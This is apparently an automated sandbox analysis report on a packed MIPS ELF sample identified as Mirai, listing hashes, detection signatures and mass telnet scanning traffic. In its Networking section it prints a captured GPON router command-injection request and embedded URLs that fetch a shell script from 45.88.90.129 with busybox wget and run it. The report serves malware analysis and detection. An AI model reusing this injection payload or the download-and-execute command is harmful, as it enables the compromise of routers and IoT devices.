Linux Analysis Report
Q1BPEcSFNH.elf

Overview

General Information

Sample Name: Q1BPEcSFNH.elf
Original Sample Name: 7fe53af62bda8d7e8673865f9e5ec70b.elf
Analysis ID: 1345560
MD5: 7fe53af62bda8d7e8673865f9e5ec70b
SHA1: ad36ac4ffd5ef28b38bce8669873ac53b13fcd32
SHA256: eedec4c30de491311570032616ad5c90f1e594e1cd6b335584ee6d44969c5338
Tags: 32, elf, mips, mirai

Detection

Mirai
Score: 72
Range: 0 - 100
Whitelisted: false

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Sample is packed with UPX
Uses known network protocols on non-standard ports
Sample contains only a LOAD segment without any section mappings
Yara signature match
Uses the "uname" system call to query kernel version information (possible evasion)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
ELF contains segments with high entropy indicating compressed/encrypted content

Classification

Name: Mirai
Description: Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

AV Detection

Source: Q1BPEcSFNH.elf ReversingLabs: Detection: 21%
Source: Q1BPEcSFNH.elf Virustotal: Detection: 22%

Networking

Source: global traffic TCP traffic: 192.168.2.23:44648 -> 45.88.90.129:9902
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 190.155.41.237:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 136.204.212.188:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 147.93.223.239:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 98.147.181.116:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 72.41.108.113:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 153.185.196.110:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 211.191.27.139:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 63.242.189.205:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 143.92.197.70:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 140.1.196.164:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 133.76.25.34:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 136.81.29.217:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 150.236.122.172:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 108.82.58.36:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 115.57.6.58:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 132.224.169.254:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 176.106.225.4:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 14.119.249.4:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 198.96.245.240:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 190.122.122.110:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 32.35.94.41:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 153.176.69.219:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 66.186.225.185:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 83.128.222.78:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 23.198.92.138:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 132.142.170.26:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 163.149.7.90:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 67.181.192.169:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 19.222.2.23:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 93.20.228.100:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 139.88.173.61:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 203.188.67.105:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 181.81.152.195:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 86.163.57.206:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 57.157.52.87:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 104.96.223.168:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 16.31.118.4:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 101.134.64.88:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 200.197.59.167:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 53.179.37.154:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 126.134.160.106:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 98.189.64.121:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 107.139.251.212:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 141.138.115.21:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 178.223.243.140:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 129.53.208.65:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 155.201.161.82:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 86.122.150.97:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 171.12.243.232:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 168.117.81.96:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 97.106.170.102:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 168.14.150.191:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 123.120.166.63:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 105.155.85.35:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 76.78.105.80:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 73.141.52.181:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 123.28.103.228:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 71.0.140.161:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 124.147.149.248:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 201.56.208.246:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 140.177.8.222:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 40.201.63.158:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 121.97.62.171:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 204.30.157.241:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 65.222.219.44:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 9.253.211.167:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 160.161.158.142:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 196.76.115.29:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 18.135.182.90:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 136.52.171.81:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 20.133.24.121:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 144.216.5.25:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 213.40.144.246:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 102.88.250.68:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 132.174.38.113:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 175.13.146.249:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 169.237.163.32:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 139.24.101.151:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 17.122.134.153:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 109.219.191.63:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 18.207.16.247:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 48.218.4.189:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 39.239.173.69:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 84.162.218.207:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 163.181.53.67:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 88.54.103.41:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 14.55.218.156:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 164.161.93.187:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 5.127.233.29:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 82.189.242.144:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 119.158.100.165:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 18.252.12.4:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 70.252.87.149:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 43.121.41.239:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 60.153.82.187:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 82.135.192.2:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 79.173.138.158:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 119.207.161.81:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 9.110.86.215:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 70.140.169.200:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 178.113.218.21:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 13.22.190.194:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 1.130.245.140:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 64.10.144.139:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 14.90.112.208:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 204.109.177.119:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 120.182.98.94:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 95.195.5.90:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 152.118.233.149:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 87.146.198.231:2323
Source: global traffic TCP traffic: 192.168.2.23:48513 -> 147.6.25.122:2323
Source: /tmp/Q1BPEcSFNH.elf (PID: 6249) Socket: 127.0.0.1::16384
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40486
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40484
Source: unknown Network traffic detected: HTTP traffic on port 33500 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35532 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44840
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40488
Source: unknown Network traffic detected: HTTP traffic on port 35922 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60192 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38160
Source: unknown Network traffic detected: HTTP traffic on port 50148 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38166
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39496
Source: unknown Network traffic detected: HTTP traffic on port 38122 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55510
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32852
Source: unknown Network traffic detected: HTTP traffic on port 36698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35246 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32850
Source: unknown Network traffic detected: HTTP traffic on port 38810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52490
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51162
Source: unknown Network traffic detected: HTTP traffic on port 57456 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60696 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40474
Source: unknown Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38524 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 46362 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39482
Source: unknown Network traffic detected: HTTP traffic on port 55046 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36526 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53426 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60638 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 44742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56860
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40464
Source: unknown Network traffic detected: HTTP traffic on port 33728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 40322 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41794
Source: unknown Network traffic detected: HTTP traffic on port 37278 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39470
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51178
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55532
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54206
Source: unknown Network traffic detected: HTTP traffic on port 33122 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47090
Source: unknown Network traffic detected: HTTP traffic on port 55734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51182
Source: unknown Network traffic detected: HTTP traffic on port 57158 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 34676 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41788
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40454
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43562
Source: unknown Network traffic detected: HTTP traffic on port 34240 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35938
Source: unknown Network traffic detected: HTTP traffic on port 55800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57122 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52434
Source: unknown Network traffic detected: HTTP traffic on port 58574 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 44606 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59076
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59078
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59072
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43552
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44880
Source: unknown Network traffic detected: HTTP traffic on port 43326 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43550
Source: unknown Network traffic detected: HTTP traffic on port 55746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 33158 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51118
Source: unknown Network traffic detected: HTTP traffic on port 40012 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 34128 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 41464 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53774
Source: unknown Network traffic detected: HTTP traffic on port 44352 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51112
Source: unknown Network traffic detected: HTTP traffic on port 33536 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32898
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35922
Source: unknown Network traffic detected: HTTP traffic on port 41508 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56588 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60396 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 41750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 46108 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 39804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55594 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54142 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53438 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59086
Source: unknown Network traffic detected: HTTP traffic on port 58692 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47900
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44872
Source: unknown Network traffic detected: HTTP traffic on port 33134 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 47720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38194
Source: unknown Network traffic detected: HTTP traffic on port 46616 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32886
Source: unknown Network traffic detected: HTTP traffic on port 37942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32884
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52458
Source: unknown Network traffic detected: HTTP traffic on port 51004 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58184 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35222 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57432 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53790
Source: unknown Network traffic detected: HTTP traffic on port 41476 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 45622 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44862
Source: unknown Network traffic detected: HTTP traffic on port 38970 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53286 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58414 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59092
Source: unknown Network traffic detected: HTTP traffic on port 59250 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38180
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38182
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35908
Source: unknown Network traffic detected: HTTP traffic on port 52522 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36502 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38188
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51134
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32878
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53794
Source: unknown Network traffic detected: HTTP traffic on port 38090 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51138
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43528
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44858
Source: unknown Network traffic detected: HTTP traffic on port 44364 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44850
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42272
Source: unknown Network traffic detected: HTTP traffic on port 36878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49460 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42274
Source: unknown Network traffic detected: HTTP traffic on port 37848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45300
Source: unknown Network traffic detected: HTTP traffic on port 34404 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49030 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60938
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58616
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34648
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35976
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58614
Source: unknown Network traffic detected: HTTP traffic on port 54318 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34642
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33312
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59950
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55594
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34650
Source: unknown Network traffic detected: HTTP traffic on port 48506 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36380 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55592
Source: unknown Network traffic detected: HTTP traffic on port 60938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 40882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60934
Source: unknown Network traffic detected: HTTP traffic on port 55718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56294 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43596
Source: unknown Network traffic detected: HTTP traffic on port 37660 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47950
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43592
Source: unknown Network traffic detected: HTTP traffic on port 40228 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43460 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42264
Source: unknown Network traffic detected: HTTP traffic on port 32824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 33846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54268
Source: unknown Network traffic detected: HTTP traffic on port 50448 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59954
Source: unknown Network traffic detected: HTTP traffic on port 53962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58622
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59956
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58624
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54272
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35972
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33310
Source: unknown TCP traffic detected without corresponding DNS query: 119.107.252.116
Source: Q1BPEcSFNH.elf, 6249.1.00007f2584400000.00007f258441b000.r-x.sdmp, Q1BPEcSFNH.elf, 6252.1.00007f2584400000.00007f258441b000.r-x.sdmp, Q1BPEcSFNH.elf, 6258.1.00007f2584400000.00007f258441b000.r-x.sdmp String found in binary or memory: http://45.88.90.129/bins/Rakitin.mips%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: Q1BPEcSFNH.elf, 6258.1.00007f2584400000.00007f258441b000.r-x.sdmp String found in binary or memory: http://45.88.90.129/bins/Rakitin.sh
Source: Q1BPEcSFNH.elf String found in binary or memory: http://upx.sf.net
Source: unknown HTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1 User-Agent: Hello, World Accept: */* Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.88.90.129/bins/Rakitin.sh+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0

System Summary

Source: 6252.1.00007f2584400000.00007f258441b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6252.1.00007f2584400000.00007f258441b000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6249.1.00007f2584400000.00007f258441b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6249.1.00007f2584400000.00007f258441b000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6258.1.00007f2584400000.00007f258441b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6258.1.00007f2584400000.00007f258441b000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: Process Memory Space: Q1BPEcSFNH.elf PID: 6249, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: Q1BPEcSFNH.elf PID: 6252, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: Q1BPEcSFNH.elf PID: 6258, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: LOAD without section mappings Program segment: 0x100000
Source: classification engine Classification label: mal72.troj.evad.linELF@0/0@0/0

Data Obfuscation

Source: initial sample String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample String containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 23 -> 51822
Source: Q1BPEcSFNH.elf Submission file: segment LOAD with 7.9446 entropy (max. 8.0)
Source: /tmp/Q1BPEcSFNH.elf (PID: 6249) Queries kernel information via 'uname'
Source: Q1BPEcSFNH.elf, 6249.1.00005575530f4000.000055755319b000.rw-.sdmp, Q1BPEcSFNH.elf, 6252.1.00005575530f4000.000055755317b000.rw-.sdmp, Q1BPEcSFNH.elf, 6258.1.00005575530f4000.000055755317b000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/mipsel
Source: Q1BPEcSFNH.elf, 6249.1.00007ffdb6545000.00007ffdb6566000.rw-.sdmp, Q1BPEcSFNH.elf, 6252.1.00007ffdb6545000.00007ffdb6566000.rw-.sdmp, Q1BPEcSFNH.elf, 6258.1.00007ffdb6545000.00007ffdb6566000.rw-.sdmp Binary or memory string: C~ex86_64/usr/bin/qemu-mipsel/tmp/Q1BPEcSFNH.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Q1BPEcSFNH.elf
Source: Q1BPEcSFNH.elf, 6249.1.00005575530f4000.000055755319b000.rw-.sdmp, Q1BPEcSFNH.elf, 6252.1.00005575530f4000.000055755317b000.rw-.sdmp, Q1BPEcSFNH.elf, 6258.1.00005575530f4000.000055755317b000.rw-.sdmp Binary or memory string: SuU!/etc/qemu-binfmt/mipsel
Source: Q1BPEcSFNH.elf, 6249.1.00007ffdb6545000.00007ffdb6566000.rw-.sdmp, Q1BPEcSFNH.elf, 6252.1.00007ffdb6545000.00007ffdb6566000.rw-.sdmp, Q1BPEcSFNH.elf, 6258.1.00007ffdb6545000.00007ffdb6566000.rw-.sdmp Binary or memory string: /usr/bin/qemu-mipsel

Stealing of Sensitive Information

Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match File source: dump.pcap, type: PCAP